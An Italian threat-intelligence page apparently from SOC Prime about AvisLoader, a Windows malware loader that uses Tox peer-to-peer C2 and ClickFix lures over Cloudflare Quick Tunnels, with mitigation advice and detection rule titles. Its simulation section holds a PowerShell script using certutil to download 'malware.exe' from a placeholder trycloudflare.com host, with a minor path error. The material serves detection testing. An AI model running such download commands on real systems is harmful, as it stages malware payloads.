SOC Prime Bias: High

25 Sep 2026 08:27 UTC

AvisLoader emerge come un resistente caricatore di malware per Windows

Author Photo
SOC Prime Team linkedin icon Segui
AvisLoader emerge come un resistente caricatore di malware per Windows
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Riassunto

AvisLoader è un nuovo malware loader per Windows che utilizza la rete di messaggistica peer-to-peer (P2P) Tox per la comunicazione di comando e controllo (C2). Questo approccio decentralizzato consente agli operatori di mantenere la connettività e riposizionare i controller senza dipendere da domini fissi o server centralizzati. Il malware viene comunemente distribuito tramite esche di ingegneria sociale ClickFix ospitate sull’infrastruttura di Cloudflare.

Indagine

I Varonis Threat Labs hanno scoperto il loader su un server di staging esposto insieme al suo centro di comando e agli strumenti correlati. L’indagine ha identificato un’esca ClickFix a tema DocuSign che istruisce gli utenti a eseguire comandi per recuperare i payload tramite Cloudflare Quick Tunnels. L’analisi dell’eseguibile ha rilevato comunicazioni C2 basate su Tox, funzionalità di bypass UAC e moduli progettati per nascondere i processi dannosi.

Mitigazione

Le organizzazioni dovrebbero istruire gli utenti a riconoscere e segnalare i prompt di firma di documenti che chiedono loro di incollare comandi nei terminali o nella finestra di dialogo Esegui di Windows. I team di sicurezza dovrebbero monitorare l’uso sospetto di Cloudflare Workers e Quick Tunnels in esche basate sul web. Anche il rilevamento di traffico di rete peer-to-peer (P2P) inaspettato e modifiche non autorizzate ai collegamenti sul desktop può aiutare a ridurre il rischio.

Risposta

Quando viene rilevata un’attività di AvisLoader, i team di sicurezza dovrebbero esaminare la gerarchia dei processi delle shell di comando e degli interpreti di script avviati dopo visite a domini sospetti. Ispezionare i punti terminali per scorciatoie modificate, .backup file, e l’artefatto VLCAssistant . Anche la telemetria di rete dovrebbe essere esaminata per traffico insolito del protocollo Tox originato dagli host colpiti.

Flusso di Attacco

Stiamo ancora aggiornando questa parte.

Rilevamenti

Eseguibile Sospetto Contenente Solo Numeri Nel Nome (via cmdline)

Team SOC Prime
24 Set 2026

Comunicazione Dominio Trycloudflare Sospetto (via dns)

Team SOC Prime
24 Set 2026

Tentativo di Esecuzione Curl Sospetto [MacOS] (via cmdline)

Team SOC Prime
24 Set 2026

IOC (HashSha256) per rilevare: Meet AvisLoader: A Windows Loader Built to Outlast a Takedown

Regole AI del SOC Prime
24 Set 2026

Rileva Traffico Tox o Peer-to-Peer Inaspettato [Connessione di Rete Windows]

Regole AI del SOC Prime
24 Set 2026

Rilevamento di Esecuzione di Codice Remoto tramite Shell di Comando e Cloudflare Quick Tunnel [Creazione Processo Windows]

Regole AI del SOC Prime
24 Set 2026

Esecuzione di Simulazione

  • Narrazione & Comandi dell’Attacco: Un avversario ha ottenuto l’accesso iniziale a una workstation. Per mantenere la persistenza e scaricare il loro payload modulare secondario, utilizzano un Tunnel Quick di Cloudflare per aggirare il filtraggio di uscita. L’attaccante utilizza certutil.exe, un’utilità integrata di Windows, per scaricare il payload da https://malicious-tunnel-id.trycloudflare.com/payload.exe. Questo metodo è scelto perché certutil è un binario fidato e il traffico sembra dirigersi verso un’infrastruttura legittima di Cloudflare, rendendolo meno probabile da segnalare dai filtri di reputazione di rete di base.

  • Script di Test di Regressione:

    # Script di simulazione per attivare la regola di rilevamento.
    # Questo utilizza certutil per tentare un download da un indirizzo trycloudflare.com.
    
    $targetUrl = "https://fake-tunnel-id-1234.trycloudflare.com/malware.exe"
    Write-Host "[*] Simulazione dell'attività avversaria: Download da $targetUrl tramite certutil..."
    
    # Il seguente comando è progettato per attivare le condizioni 'selection_tunnel' E 'selection_tools'.
    certutil.exe -urlcache -split -f "$targetUrl" "$env:TEMPmalware.exe"
    
    if ($LASTEXITCODE -eq 0) {
        Write-Host "[+] Comando di simulazione eseguito con successo."
    } else {
        Write-Host "[-] Comando fallito (atteso se l'URL è inesistente, ma la telemetria dovrebbe comunque essere generata)."
    }
  • Comandi di Pulizia:

    # Script di pulizia per rimuovere il payload simulato e gli artefatti locali.
    $tempFile = "$env:TEMPmalware.exe"
    if (Test-Path $tempFile) {
        Remove-Item -Path $tempFile -Force
        Write-Host "[+] Pulito $tempFile"
    } else {
        Write-Host "[-] Nessun artefatto trovato da pulire."
    }